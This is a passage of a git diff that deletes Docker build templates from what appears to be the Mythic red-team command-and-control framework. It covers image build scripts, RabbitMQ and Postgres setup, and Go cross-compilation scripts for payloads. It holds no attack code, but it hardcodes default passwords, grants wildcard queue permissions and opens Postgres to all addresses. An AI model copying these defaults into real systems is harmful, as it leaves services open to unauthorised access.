a/Docker_Templates/Docker_C2_Profile_base_files/c2_service.sh b/Docker_Templates/Docker_C2_Profile_base_files/c2_service.sh deleted file mode 100755 index 00627848a..000000000 --- a/Docker_Templates/Docker_C2_Profile_base_files/c2_service.sh +++ /dev/null @@ -1,7 +0,0 @@ -#!/bin/bash - -cd /Mythic/mythic - -export PYTHONPATH=/Mythic:/Mythic/mythic - -python3.8 mythic_service.py diff --git a/Docker_Templates/Docker_C2_Profile_base_files/create_base_images.sh b/Docker_Templates/Docker_C2_Profile_base_files/create_base_images.sh deleted file mode 100755 index 3e6b450cc..000000000 --- a/Docker_Templates/Docker_C2_Profile_base_files/create_base_images.sh +++ /dev/null @@ -1,4 +0,0 @@ -echo "Pruning old images..." -docker image prune -f -echo "Building golden python3.8 sanic image..." -docker build -f "python38_sanic_dockerfile" --rm -t "python38_sanic_c2profile" . \ No newline at end of file diff --git a/Docker_Templates/Docker_C2_Profile_base_files/python38_sanic_dockerfile b/Docker_Templates/Docker_C2_Profile_base_files/python38_sanic_dockerfile deleted file mode 100644 index fb4fe1541..000000000 --- a/Docker_Templates/Docker_C2_Profile_base_files/python38_sanic_dockerfile +++ /dev/null @@ -1,6 +0,0 @@ -From python:3.8-buster -RUN pip install aio_pika sanic requests - -ENV PYTHONWARNINGS="ignore:Unverified HTTPS request" - -ENTRYPOINT ["/Mythic/mythic/c2_service.sh"] \ No newline at end of file diff --git a/Docker_Templates/Docker_Mythic_Services_base_files/config_rabbit.sh b/Docker_Templates/Docker_Mythic_Services_base_files/config_rabbit.sh deleted file mode 100755 index a1def7a38..000000000 --- a/Docker_Templates/Docker_Mythic_Services_base_files/config_rabbit.sh +++ /dev/null @@ -1,35 +0,0 @@ -#!/bin/bash - -# This script needs to be executed just once -if [ -f /$0.completed ] ; then - echo "$0 `date` /$0.completed found, skipping run" - exit 0 -fi - -# Wait for RabbitMQ startup -for (( ; ; )) ; do - sleep 2 - rabbitmqctl -q node_health_check > /dev/null 2>&1 - if [ $? -eq 0 ] ; then - echo "$0 `date` rabbitmq is now running" - break - else - echo "$0 `date` waiting for rabbitmq startup" - fi -done - -# Execute RabbitMQ config commands here - -# Create user -rabbitmqctl add_user mythic_user mythic_password -rabbitmqctl add_vhost mythic_vhost -rabbitmqctl set_user_tags mythic_user administrator -rabbitmqctl set_permissions -p mythic_vhost mythic_user ".*" ".*" ".*" -echo "$0 `date` user mythic_user created" - -# Create queue -#rabbitmqadmin declare queue name=QUEUE durable=true -#echo "$0 `date` queues created" - -# Create mark so script is not ran again -touch /$0.completed diff --git a/Docker_Templates/Docker_Mythic_Services_base_files/create_base_images.sh b/Docker_Templates/Docker_Mythic_Services_base_files/create_base_images.sh deleted file mode 100755 index 550bdb8a2..000000000 --- a/Docker_Templates/Docker_Mythic_Services_base_files/create_base_images.sh +++ /dev/null @@ -1,12 +0,0 @@ -echo "Pruning old images..." -docker image prune -f -echo "Building golden postgres image..." -docker build -f "mythic_postgres" --rm -t "mythic_postgres" . - -docker image prune -f -echo "Building golden rabbitmq image..." -docker build -f "mythic_rabbitmq" --rm -t "mythic_rabbitmq" . - -docker image prune -f -echo "Building golden server image..." -docker build -f "mythic_server" --rm -t "mythic_server" . \ No newline at end of file diff --git a/Docker_Templates/Docker_Mythic_Services_base_files/init.sh b/Docker_Templates/Docker_Mythic_Services_base_files/init.sh deleted file mode 100755 index cd631b121..000000000 --- a/Docker_Templates/Docker_Mythic_Services_base_files/init.sh +++ /dev/null @@ -1,8 +0,0 @@ -#!/bin/bash - -# Launch config script in background -# Note there is no RabbitMQ Docker image support for executing commands after server (PID 1) is running (something like "ADD schema.sql /docker-entrypoint-initdb.d" in MySql image), so we are using this trick -/config_rabbit.sh & - -# Launch -/docker-entrypoint.sh rabbitmq-server diff --git a/Docker_Templates/Docker_Mythic_Services_base_files/mythic_postgres b/Docker_Templates/Docker_Mythic_Services_base_files/mythic_postgres deleted file mode 100644 index 34f160b83..000000000 --- a/Docker_Templates/Docker_Mythic_Services_base_files/mythic_postgres +++ /dev/null @@ -1,6 +0,0 @@ -From postgres:9.4 -COPY postgres.conf /etc/postgresql/postgresql.conf -ENV config_file=/etc/postgresql/postgresql.conf -ENV POSTGRES_USER 'mythic_user' -ENV POSTGRES_PASSWORD 'super_secret_mythic_user_password' -ENV POSTGRES_DB 'mythic_db' diff --git a/Docker_Templates/Docker_Mythic_Services_base_files/mythic_rabbitmq b/Docker_Templates/Docker_Mythic_Services_base_files/mythic_rabbitmq deleted file mode 100644 index 289d6c0c4..000000000 --- a/Docker_Templates/Docker_Mythic_Services_base_files/mythic_rabbitmq +++ /dev/null @@ -1,7 +0,0 @@ -FROM rabbitmq:3.7.6-management - -ADD init.sh / -ADD config_rabbit.sh / -RUN chmod +x /init.sh /config_rabbit.sh - -ENTRYPOINT ["/init.sh"] diff --git a/Docker_Templates/Docker_Mythic_Services_base_files/mythic_server b/Docker_Templates/Docker_Mythic_Services_base_files/mythic_server deleted file mode 100644 index 753648fe4..000000000 --- a/Docker_Templates/Docker_Mythic_Services_base_files/mythic_server +++ /dev/null @@ -1,5 +0,0 @@ -From python:3.8-buster -RUN mkdir /Mythic -WORKDIR /Mythic -COPY ["requirements.txt", "/Mythic/requirements.txt"] -RUN pip install -r /Mythic/requirements.txt diff --git a/Docker_Templates/Docker_Mythic_Services_base_files/postgres.conf b/Docker_Templates/Docker_Mythic_Services_base_files/postgres.conf deleted file mode 100755 index a5b3e95c6..000000000 --- a/Docker_Templates/Docker_Mythic_Services_base_files/postgres.conf +++ /dev/null @@ -1,610 +0,0 @@ -# ----------------------------- -# PostgreSQL configuration file -# ----------------------------- -# -# This file consists of lines of the form: -# -# name = value -# -# (The "=" is optional.) Whitespace may be used. Comments are introduced with -# "#" anywhere on a line. The complete list of parameter names and allowed -# values can be found in the PostgreSQL documentation. -# -# The commented-out settings shown in this file represent the default values. -# Re-commenting a setting is NOT sufficient to revert it to the default value; -# you need to reload the server. -# -# This file is read on server startup and when the server receives a SIGHUP -# signal. If you edit the file on a running system, you have to SIGHUP the -# server for the changes to take effect, or use "pg_ctl reload". Some -# parameters, which are marked below, require a server shutdown and restart to -# take effect. -# -# Any parameter can also be given as a command-line option to the server, e.g., -# "postgres -c log_connections=on". Some parameters can be changed at run time -# with the "SET" SQL command. -# -# Memory units: kB = kilobytes Time units: ms = milliseconds -# MB = megabytes s = seconds -# GB = gigabytes min = minutes -# TB = terabytes h = hours -# d = days - - -#------------------------------------------------------------------------------ -# FILE LOCATIONS -#------------------------------------------------------------------------------ - -# The default values of these variables are driven from the -D command-line -# option or PGDATA environment variable, represented here as ConfigDir. - -#data_directory = 'ConfigDir' # use data in another directory - # (change requires restart) -#hba_file = 'ConfigDir/pg_hba.conf' # host-based authentication file - # (change requires restart) -#ident_file = 'ConfigDir/pg_ident.conf' # ident configuration file - # (change requires restart) - -# If external_pid_file is not explicitly set, no extra PID file is written. -#external_pid_file = '' # write an extra PID file - # (change requires restart) - - -#------------------------------------------------------------------------------ -# CONNECTIONS AND AUTHENTICATION -#------------------------------------------------------------------------------ - -# - Connection Settings - - -listen_addresses = '*' - # comma-separated list of addresses; - # defaults to 'localhost'; use '*' for all - # (change requires restart) -#port = 5432 # (change requires restart) -#max_connections = 100 # (change requires restart) -#superuser_reserved_connections = 3 # (change requires restart) -#unix_socket_directories = '/tmp' # comma-separated list of directories - # (change requires restart) -#unix_socket_group = '' # (change requires restart) -#unix_socket_permissions = 0777 # begin with 0 to use octal notation - # (change requires restart) -#bonjour = off # advertise server via Bonjour - # (change requires restart) -#bonjour_name = '' # defaults to the computer name - # (change requires restart) - -# - Security and Authentication - - -#authentication_timeout = 1min # 1s-600s -#ssl = off # (change requires restart) -#ssl_ciphers = 'HIGH:MEDIUM:+3DES:!aNULL' # allowed SSL ciphers - # (change requires restart) -#ssl_prefer_server_ciphers = on # (change requires restart) -#ssl_ecdh_curve = 'prime256v1' # (change requires restart) -#ssl_renegotiation_limit = 0 # amount of data between renegotiations -#ssl_cert_file = 'server.crt' # (change requires restart) -#ssl_key_file = 'server.key' # (change requires restart) -#ssl_ca_file = '' # (change requires restart) -#ssl_crl_file = '' # (change requires restart) -#password_encryption = on -#db_user_namespace = off - -# GSSAPI using Kerberos -#krb_server_keyfile = '' -#krb_caseins_users = off - -# - TCP Keepalives - -# see "man 7 tcp" for details - -#tcp_keepalives_idle = 0 # TCP_KEEPIDLE, in seconds; - # 0 selects the system default -#tcp_keepalives_interval = 0 # TCP_KEEPINTVL, in seconds; - # 0 selects the system default -#tcp_keepalives_count = 0 # TCP_KEEPCNT; - # 0 selects the system default - - -#------------------------------------------------------------------------------ -# RESOURCE USAGE (except WAL) -#------------------------------------------------------------------------------ - -# - Memory - - -#shared_buffers = 32MB # min 128kB - # (change requires restart) -#huge_pages = try # on, off, or try - # (change requires restart) -#temp_buffers = 8MB # min 800kB -#max_prepared_transactions = 0 # zero disables the feature - # (change requires restart) -# Caution: it is not advisable to set max_prepared_transactions nonzero unless -# you actively intend to use prepared transactions. -#work_mem = 4MB # min 64kB -#maintenance_work_mem = 64MB # min 1MB -#autovacuum_work_mem = -1 # min 1MB, or -1 to use maintenance_work_mem -#max_stack_depth = 2MB # min 100kB -#dynamic_shared_memory_type = posix # the default is the first option - # supported by the operating system: - # posix - # sysv - # windows - # mmap - # use none to disable dynamic shared memory - # (change requires restart) - -# - Disk - - -#temp_file_limit = -1 # limits per-session temp file space - # in kB, or -1 for no limit - -# - Kernel Resource Usage - - -#max_files_per_process = 1000 # min 25 - # (change requires restart) -#shared_preload_libraries = '' # (change requires restart) - -# - Cost-Based Vacuum Delay - - -#vacuum_cost_delay = 0 # 0-100 milliseconds -#vacuum_cost_page_hit = 1 # 0-10000 credits -#vacuum_cost_page_miss = 10 # 0-10000 credits -#vacuum_cost_page_dirty = 20 # 0-10000 credits -#vacuum_cost_limit = 200 # 1-10000 credits - -# - Background Writer - - -#bgwriter_delay = 200ms # 10-10000ms between rounds -#bgwriter_lru_maxpages = 100 # 0-1000 max buffers written/round -#bgwriter_lru_multiplier = 2.0 # 0-10.0 multipler on buffers scanned/round - -# - Asynchronous Behavior - - -#effective_io_concurrency = 1 # 1-1000; 0 disables prefetching -#max_worker_processes = 8 - - -#------------------------------------------------------------------------------ -# WRITE AHEAD LOG -#------------------------------------------------------------------------------ - -# - Settings - - -#wal_level = minimal # minimal, archive, hot_standby, or logical - # (change requires restart) -#fsync = on # turns forced synchronization on or off -#synchronous_commit = on # synchronization level; - # off, local, remote_write, or on -#wal_sync_method = fsync # the default is the first option - # supported by the operating system: - # open_datasync - # fdatasync (default on Linux) - # fsync - # fsync_writethrough - # open_sync -#full_page_writes = on # recover from partial page writes -#wal_log_hints = off # also do full page writes of non-critical updates - # (change requires restart) -#wal_buffers = -1 # min 32kB, -1 sets based on shared_buffers - # (change requires restart) -#wal_writer_delay = 200ms # 1-10000 milliseconds - -#commit_delay = 0 # range 0-100000, in microseconds -#commit_siblings = 5 # range 1-1000 - -# - Checkpoints - - -#checkpoint_segments = 3 # in logfile segments, min 1, 16MB each -#checkpoint_timeout = 5min # range 30s-1h -#checkpoint_completion_target = 0.5 # checkpoint target duration, 0.0 - 1.0 -#checkpoint_warning = 30s # 0 disables - -# - Archiving - - -#archive_mode = off # allows archiving to be done - # (change requires restart) -#archive_command = '' # command to use to archive a logfile segment - # placeholders: %p = path of file to archive - # %f = file name only - # e.g. 'test ! -f /mnt/server/archivedir/%f && cp %p /mnt/server/archivedir/%f' -#archive_timeout = 0 # force a logfile segment switch after this - # number of seconds; 0 disables - - -#------------------------------------------------------------------------------ -# REPLICATION -#------------------------------------------------------------------------------ - -# - Sending Server(s) - - -# Set these on the master and on any standby that will send replication data. - -#max_wal_senders = 0 # max number of walsender processes - # (change requires restart) -#wal_keep_segments = 0 # in logfile segments, 16MB each; 0 disables -#wal_sender_timeout = 60s # in milliseconds; 0 disables - -#max_replication_slots = 0 # max number of replication slots - # (change requires restart) - -# - Master Server - - -# These settings are ignored on a standby server. - -#synchronous_standby_names = '' # standby servers that provide sync rep - # comma-separated list of application_name - # from standby(s); '*' = all -#vacuum_defer_cleanup_age = 0 # number of xacts by which cleanup is delayed - -# - Standby Servers - - -# These settings are ignored on a master server. - -#hot_standby = off # "on" allows queries during recovery - # (change requires restart) -#max_standby_archive_delay = 30s # max delay before canceling queries - # when reading WAL from archive; - # -1 allows indefinite delay -#max_standby_streaming_delay = 30s # max delay before canceling queries - # when reading streaming WAL; - # -1 allows indefinite delay -#wal_receiver_status_interval = 10s # send replies at least this often - # 0 disables -#hot_standby_feedback = off # send info from standby to prevent - # query conflicts -#wal_receiver_timeout = 60s # time that receiver waits for - # communication from master - # in milliseconds; 0 disables - - -#------------------------------------------------------------------------------ -# QUERY TUNING -#------------------------------------------------------------------------------ - -# - Planner Method Configuration - - -#enable_bitmapscan = on -#enable_hashagg = on -#enable_hashjoin = on -#enable_indexscan = on -#enable_indexonlyscan = on -#enable_material = on -#enable_mergejoin = on -#enable_nestloop = on -#enable_seqscan = on -#enable_sort = on -#enable_tidscan = on - -# - Planner Cost Constants - - -#seq_page_cost = 1.0 # measured on an arbitrary scale -#random_page_cost = 4.0 # same scale as above -#cpu_tuple_cost = 0.01 # same scale as above -#cpu_index_tuple_cost = 0.005 # same scale as above -#cpu_operator_cost = 0.0025 # same scale as above -#effective_cache_size = 4GB - -# - Genetic Query Optimizer - - -#geqo = on -#geqo_threshold = 12 -#geqo_effort = 5 # range 1-10 -#geqo_pool_size = 0 # selects default based on effort -#geqo_generations = 0 # selects default based on effort -#geqo_selection_bias = 2.0 # range 1.5-2.0 -#geqo_seed = 0.0 # range 0.0-1.0 - -# - Other Planner Options - - -#default_statistics_target = 100 # range 1-10000 -#constraint_exclusion = partition # on, off, or partition -#cursor_tuple_fraction = 0.1 # range 0.0-1.0 -#from_collapse_limit = 8 -#join_collapse_limit = 8 # 1 disables collapsing of explicit - # JOIN clauses - - -#------------------------------------------------------------------------------ -# ERROR REPORTING AND LOGGING -#------------------------------------------------------------------------------ - -# - Where to Log - - -#log_destination = 'stderr' # Valid values are combinations of - # stderr, csvlog, syslog, and eventlog, - # depending on platform. csvlog - # requires logging_collector to be on. - -# This is used when logging to stderr: -#logging_collector = off # Enable capturing of stderr and csvlog - # into log files. Required to be on for - # csvlogs. - # (change requires restart) - -# These are only used if logging_collector is on: -#log_directory = 'pg_log' # directory where log files are written, - # can be absolute or relative to PGDATA -#log_filename = 'postgresql-%Y-%m-%d_%H%M%S.log' # log file name pattern, - # can include strftime() escapes -#log_file_mode = 0600 # creation mode for log files, - # begin with 0 to use octal notation -#log_truncate_on_rotation = off # If on, an existing log file with the - # same name as the new log file will be - # truncated rather than appended to. - # But such truncation only occurs on - # time-driven rotation, not on restarts - # or size-driven rotation. Default is - # off, meaning append to existing files - # in all cases. -#log_rotation_age = 1d # Automatic rotation of logfiles will - # happen after that time. 0 disables. -#log_rotation_size = 10MB # Automatic rotation of logfiles will - # happen after that much log output. - # 0 disables. - -# These are relevant when logging to syslog: -#syslog_facility = 'LOCAL0' -#syslog_ident = 'postgres' - -# This is only relevant when logging to eventlog (win32): -# (change requires restart) -#event_source = 'PostgreSQL' - -# - When to Log - - -#log_min_messages = warning # values in order of decreasing detail: - # debug5 - # debug4 - # debug3 - # debug2 - # debug1 - # info - # notice - # warning - # error - # log - # fatal - # panic - -#log_min_error_statement = error # values in order of decreasing detail: - # debug5 - # debug4 - # debug3 - # debug2 - # debug1 - # info - # notice - # warning - # error - # log - # fatal - # panic (effectively off) - -#log_min_duration_statement = -1 # -1 is disabled, 0 logs all statements - # and their durations, > 0 logs only - # statements running at least this number - # of milliseconds - - -# - What to Log - - -#debug_print_parse = off -#debug_print_rewritten = off -#debug_print_plan = off -#debug_pretty_print = on -#log_checkpoints = off -#log_connections = off -#log_disconnections = off -#log_duration = off -#log_error_verbosity = default # terse, default, or verbose messages -#log_hostname = off -#log_line_prefix = '' # special values: - # %a = application name - # %u = user name - # %d = database name - # %r = remote host and port - # %h = remote host - # %p = process ID - # %t = timestamp without milliseconds - # %m = timestamp with milliseconds - # %i = command tag - # %e = SQL state - # %c = session ID - # %l = session line number - # %s = session start timestamp - # %v = virtual transaction ID - # %x = transaction ID (0 if none) - # %q = stop here in non-session - # processes - # %% = '%' - # e.g. '<%u%%%d> ' -#log_lock_waits = off # log lock waits >= deadlock_timeout -#log_statement = 'none' # none, ddl, mod, all -#log_temp_files = -1 # log temporary files equal or larger - # than the specified size in kilobytes; - # -1 disables, 0 logs all temp files -#log_timezone = 'GMT' - - -#------------------------------------------------------------------------------ -# RUNTIME STATISTICS -#------------------------------------------------------------------------------ - -# - Query/Index Statistics Collector - - -#track_activities = on -#track_counts = on -#track_io_timing = off -#track_functions = none # none, pl, all -#track_activity_query_size = 1024 # (change requires restart) -#update_process_title = on -#stats_temp_directory = 'pg_stat_tmp' - - -# - Statistics Monitoring - - -#log_parser_stats = off -#log_planner_stats = off -#log_executor_stats = off -#log_statement_stats = off - - -#------------------------------------------------------------------------------ -# AUTOVACUUM PARAMETERS -#------------------------------------------------------------------------------ - -#autovacuum = on # Enable autovacuum subprocess? 'on' - # requires track_counts to also be on. -#log_autovacuum_min_duration = -1 # -1 disables, 0 logs all actions and - # their durations, > 0 logs only - # actions running at least this number - # of milliseconds. -#autovacuum_max_workers = 3 # max number of autovacuum subprocesses - # (change requires restart) -#autovacuum_naptime = 1min # time between autovacuum runs -#autovacuum_vacuum_threshold = 50 # min number of row updates before - # vacuum -#autovacuum_analyze_threshold = 50 # min number of row updates before - # analyze -#autovacuum_vacuum_scale_factor = 0.2 # fraction of table size before vacuum -#autovacuum_analyze_scale_factor = 0.1 # fraction of table size before analyze -#autovacuum_freeze_max_age = 200000000 # maximum XID age before forced vacuum - # (change requires restart) -#autovacuum_multixact_freeze_max_age = 400000000 # maximum multixact age - # before forced vacuum - # (change requires restart) -#autovacuum_vacuum_cost_delay = 20ms # default vacuum cost delay for - # autovacuum, in milliseconds; - # -1 means use vacuum_cost_delay -#autovacuum_vacuum_cost_limit = -1 # default vacuum cost limit for - # autovacuum, -1 means use - # vacuum_cost_limit - - -#------------------------------------------------------------------------------ -# CLIENT CONNECTION DEFAULTS -#------------------------------------------------------------------------------ - -# - Statement Behavior - - -#client_min_messages = notice # values in order of decreasing detail: - # debug5 - # debug4 - # debug3 - # debug2 - # debug1 - # log - # notice - # warning - # error -#search_path = '"$user",public' # schema names -#default_tablespace = '' # a tablespace name, '' uses the default -#temp_tablespaces = '' # a list of tablespace names, '' uses - # only default tablespace -#check_function_bodies = on -#default_transaction_isolation = 'read committed' -#default_transaction_read_only = off -#default_transaction_deferrable = off -#session_replication_role = 'origin' -#statement_timeout = 0 # in milliseconds, 0 is disabled -#lock_timeout = 0 # in milliseconds, 0 is disabled -#vacuum_freeze_min_age = 50000000 -#vacuum_freeze_table_age = 150000000 -#vacuum_multixact_freeze_min_age = 5000000 -#vacuum_multixact_freeze_table_age = 150000000 -#bytea_output = 'hex' # hex, escape -#xmlbinary = 'base64' -#xmloption = 'content' -#gin_fuzzy_search_limit = 0 - -# - Locale and Formatting - - -#datestyle = 'iso, mdy' -#intervalstyle = 'postgres' -#timezone = 'GMT' -#timezone_abbreviations = 'Default' # Select the set of available time zone - # abbreviations. Currently, there are - # Default - # Australia (historical usage) - # India - # You can create your own file in - # share/timezonesets/. -#extra_float_digits = 0 # min -15, max 3 -#client_encoding = sql_ascii # actually, defaults to database - # encoding - -# These settings are initialized by initdb, but they can be changed. -#lc_messages = 'C' # locale for system error message - # strings -#lc_monetary = 'C' # locale for monetary formatting -#lc_numeric = 'C' # locale for number formatting -#lc_time = 'C' # locale for time formatting - -# default configuration for text search -#default_text_search_config = 'pg_catalog.simple' - -# - Other Defaults - - -#dynamic_library_path = '$libdir' -#local_preload_libraries = '' -#session_preload_libraries = '' - - -#------------------------------------------------------------------------------ -# LOCK MANAGEMENT -#------------------------------------------------------------------------------ - -#deadlock_timeout = 1s -#max_locks_per_transaction = 64 # min 10 - # (change requires restart) -#max_pred_locks_per_transaction = 64 # min 10 - # (change requires restart) - - -#------------------------------------------------------------------------------ -# VERSION/PLATFORM COMPATIBILITY -#------------------------------------------------------------------------------ - -# - Previous PostgreSQL Versions - - -#array_nulls = on -#backslash_quote = safe_encoding # on, off, or safe_encoding -#default_with_oids = off -#escape_string_warning = on -#lo_compat_privileges = off -#quote_all_identifiers = off -#sql_inheritance = on -#standard_conforming_strings = on -#synchronize_seqscans = on - -# - Other Platforms and Clients - - -#transform_null_equals = off - - -#------------------------------------------------------------------------------ -# ERROR HANDLING -#------------------------------------------------------------------------------ - -#exit_on_error = off # terminate session on any error? -#restart_after_crash = on # reinitialize after backend crash? -#data_sync_retry = off # retry or panic on failure to fsync data? - - -#------------------------------------------------------------------------------ -# CONFIG FILE INCLUDES -#------------------------------------------------------------------------------ - -# These options allow settings to be loaded from files other than the -# default postgresql.conf. - -#include_dir = 'conf.d' # include files ending in '.conf' from - # directory 'conf.d' -#include_if_exists = 'exists.conf' # include file only if it exists -#include = 'special.conf' # include file - - -#------------------------------------------------------------------------------ -# CUSTOMIZED OPTIONS -#------------------------------------------------------------------------------ - -# Add settings for extensions here diff --git a/Docker_Templates/Docker_Mythic_Services_base_files/requirements.txt b/Docker_Templates/Docker_Mythic_Services_base_files/requirements.txt deleted file mode 100755 index 35f0ad6a8..000000000 --- a/Docker_Templates/Docker_Mythic_Services_base_files/requirements.txt +++ /dev/null @@ -1,21 +0,0 @@ -sanic -psycopg2-binary -peewee-async -aiopg -peewee -jinja2 -uvloop==0.14.0.rc1 -git+https://github.com/mikekeda/sanic-wtf -pycryptodome -wtforms -anytree -websockets -sanic-jwt -fpdf -aio-pika -requests -dijkstar -exrex -treelib -shortuuid -ujson \ No newline at end of file diff --git a/Docker_Templates/Docker_Payload_Type_base_files/System.Management.Automation.dll b/Docker_Templates/Docker_Payload_Type_base_files/System.Management.Automation.dll deleted file mode 100644 index 3ca6528d8..000000000 Binary files a/Docker_Templates/Docker_Payload_Type_base_files/System.Management.Automation.dll and /dev/null differ diff --git a/Docker_Templates/Docker_Payload_Type_base_files/System.Management.Automation.dll-v4 b/Docker_Templates/Docker_Payload_Type_base_files/System.Management.Automation.dll-v4 deleted file mode 100644 index 4ee8da017..000000000 Binary files a/Docker_Templates/Docker_Payload_Type_base_files/System.Management.Automation.dll-v4 and /dev/null differ diff --git a/Docker_Templates/Docker_Payload_Type_base_files/bootstrap_pure.sh b/Docker_Templates/Docker_Payload_Type_base_files/bootstrap_pure.sh deleted file mode 100644 index c6dde4052..000000000 --- a/Docker_Templates/Docker_Payload_Type_base_files/bootstrap_pure.sh +++ /dev/null @@ -1,38 +0,0 @@ -#!/bin/bash -# -# Contains the Go tool-chain pure-Go bootstrapper, that as of Go 1.5, initiates -# not only a few pre-built Go cross compilers, but rather bootstraps all of the -# supported platforms from the origin Linux amd64 distribution. -# -# Usage: bootstrap_pure.sh -# -# Environment variables for remote bootstrapping: -# FETCH - Remote file fetcher and checksum verifier (injected by image) -# ROOT_DIST - 64 bit Linux Go binary distribution package -# ROOT_DIST_SHA - 64 bit Linux Go distribution package checksum -# -# Environment variables for local bootstrapping: -# GOROOT - Path to the lready installed Go runtime -set -e - -# Download, verify and install the root distribution if pulled remotely -if [ "$GOROOT" == "" ]; then - $FETCH $ROOT_DIST $ROOT_DIST_SHA - - tar -C /usr/local -xzf `basename $ROOT_DIST` - rm -f `basename $ROOT_DIST` - - export GOROOT=/usr/local/go -fi -export GOROOT_BOOTSTRAP=$GOROOT - -echo "Bootstrapping linux/arm64..." -GOOS=linux GOARCH=arm64 CGO_ENABLED=1 CC=aarch64-linux-gnu-gcc-5 go install std - -echo "Bootstrapping darwin/amd64..." -GOOS=darwin GOARCH=amd64 CGO_ENABLED=1 CC=o64-clang go install std - -# Install xgo within the container to enable internal cross compilation -echo "Installing xgo-in-xgo..." -go get -u github.com/karalabe/xgo -ln -s /go/bin/xgo /usr/bin/xgo \ No newline at end of file diff --git a/Docker_Templates/Docker_Payload_Type_base_files/build.sh b/Docker_Templates/Docker_Payload_Type_base_files/build.sh deleted file mode 100644 index b75973fcf..000000000 --- a/Docker_Templates/Docker_Payload_Type_base_files/build.sh +++ /dev/null @@ -1,126 +0,0 @@ -#!/bin/bash -# -# Contains the main cross compiler, that individually sets up each target build -# platform, compiles all the C dependencies, then build the requested executable -# itself. -# -# Usage: build.sh -# -# Needed environment variables: -# REPO_REMOTE - Optional VCS remote if not the primary repository is needed -# REPO_BRANCH - Optional VCS branch to use, if not the master branch -# DEPS - Optional list of C dependency packages to build -# ARGS - Optional arguments to pass to C dependency configure scripts -# PACK - Optional sub-package, if not the import path is being built -# OUT - Optional output prefix to override the package name -# FLAG_V - Optional verbosity flag to set on the Go builder -# FLAG_X - Optional flag to print the build progress commands -# FLAG_RACE - Optional race flag to set on the Go builder -# FLAG_TAGS - Optional tag flag to set on the Go builder -# FLAG_LDFLAGS - Optional ldflags flag to set on the Go builder -# FLAG_BUILDMODE - Optional buildmode flag to set on the Go builder -# TARGETS - Comma separated list of build targets to compile for -# GO_VERSION - Bootstrapped version of Go to disable uncupported targets -# EXT_GOPATH - GOPATH elements mounted from the host filesystem - -# Define a function that figures out the binary extension -function extension { - if [ "$FLAG_BUILDMODE" == "archive" ] || [ "$FLAG_BUILDMODE" == "c-archive" ]; then - if [ "$1" == "windows" ]; then - echo ".lib" - else - echo ".a" - fi - elif [ "$FLAG_BUILDMODE" == "shared" ] || [ "$FLAG_BUILDMODE" == "c-shared" ]; then - if [ "$1" == "windows" ]; then - echo ".dll" - elif [ "$1" == "darwin" ] || [ "$1" == "ios" ]; then - echo ".dylib" - else - echo ".so" - fi - else - if [ "$1" == "windows" ]; then - echo ".exe" - fi - fi -} - -# Configure some global build parameters -NAME=`basename $1/$PACK` -if [ "$OUT" != "" ]; then - NAME=$OUT -fi - -if [ "$FLAG_V" == "true" ]; then V=-v; fi -if [ "$FLAG_X" == "true" ]; then X=-x; fi -if [ "$FLAG_RACE" == "true" ]; then R=-race; fi -if [ "$FLAG_TAGS" != "" ]; then T=(--tags "$FLAG_TAGS"); fi -if [ "$FLAG_LDFLAGS" != "" ]; then LD="$FLAG_LDFLAGS"; fi - -if [ "$FLAG_BUILDMODE" != "" ] && [ "$FLAG_BUILDMODE" != "default" ]; then BM="--buildmode=$FLAG_BUILDMODE"; fi - -# If no build targets were specified, inject a catch all wildcard -if [ "$TARGETS" == "" ]; then - TARGETS="./." -fi - -# Build for each requested platform individually -for TARGET in $TARGETS; do - # Split the target into platform and architecture - XGOOS=`echo $TARGET | cut -d '/' -f 1` - XGOARCH=`echo $TARGET | cut -d '/' -f 2` - - # Check and build for Linux targets - if ([ $XGOOS == "." ] || [ $XGOOS == "linux" ]) && ([ $XGOARCH == "." ] || [ $XGOARCH == "amd64" ]); then - echo "Compiling for linux/amd64..." - #HOST=x86_64-linux PREFIX=/usr/local $BUILD_DEPS /deps ${DEPS_ARGS[@]} - #GOOS=linux GOARCH=amd64 CGO_ENABLED=1 go get $V $X "${T[@]}" --ldflags="$V $LD" -d ./$PACK - GOOS=linux GOARCH=amd64 CGO_ENABLED=1 go build $V $X "${T[@]}" --ldflags="$V $LD" $R $BM -o "/build/$NAME-linux-amd64$R`extension linux`" ./$PACK - - fi - - # Check and build for OSX targets - if [ $XGOOS == "." ] || [[ $XGOOS == darwin* ]]; then - # Split the platform version and configure the deployment target - PLATFORM=`echo $XGOOS | cut -d '-' -f 2` - if [ "$PLATFORM" == "" ] || [ "$PLATFORM" == "." ] || [ "$PLATFORM" == "darwin" ]; then - PLATFORM=10.06 # OS X Snow Leopard - fi - export MACOSX_DEPLOYMENT_TARGET=$PLATFORM - - # Strip symbol table below Go 1.6 to prevent DWARF issues - LDSTRIP="" - if [ "$GO_VERSION" -lt 160 ]; then - LDSTRIP="-s" - fi - # Build the requested darwin binaries - if [ $XGOARCH == "." ] || [ $XGOARCH == "amd64" ]; then - echo "Compiling for darwin-$PLATFORM/amd64..." - #CC=o64-clang CXX=o64-clang++ HOST=x86_64-apple-darwin15 PREFIX=/usr/local $BUILD_DEPS /deps ${DEPS_ARGS[@]} - #CC=o64-clang CXX=o64-clang++ GOOS=darwin GOARCH=amd64 CGO_ENABLED=1 go get $V $X "${T[@]}" --ldflags="$LDSTRIP $V $LD" -d ./$PACK - CC=o64-clang CXX=o64-clang++ GOOS=darwin GOARCH=amd64 CGO_ENABLED=1 go build $V $X "${T[@]}" --ldflags="$LDSTRIP $V $LD" $R $BM -o "/build/$NAME-darwin-$PLATFORM-amd64$R`extension darwin`" ./$PACK - fi - # Remove any automatically injected deployment target vars - unset MACOSX_DEPLOYMENT_TARGET - fi -done - -# Clean up any leftovers for subsequent build invocations -#echo "Cleaning up build environment..." -#rm -rf /deps - -#for dir in `ls /usr/local`; do -# keep=0 - - # Check against original folder contents -# for old in $USR_LOCAL_CONTENTS; do -# if [ "$old" == "$dir" ]; then -# keep=1 -# fi -# done - # Delete anything freshly generated -# if [ "$keep" == "0" ]; then -# rm -rf "/usr/local/$dir" -# fi -#done \ No newline at end of file diff --git a/Docker_Templates/Docker_Payload_Type_base_files/create_base_images.sh b/Docker_Templates/Docker_Payload_Type_base_files/create_base_images.sh deleted file mode 100755 index a8c9d8daa..000000000 --- a/Docker_Templates/Docker_Payload_Type_base_files/create_base_images.sh +++ /dev/null @@ -1,16 +0,0 @@ -echo "Pruning old images..." -docker image prune -f -echo "Building golden csharp image..." -docker build -f "csharp_dockerfile" --rm -t "csharp_payload" . - -docker image prune -f -echo "Building golden python3.8 image..." -docker build -f "python38_dockerfile" --rm -t "python38_payload" . - -docker image prune -f -echo "Building golden 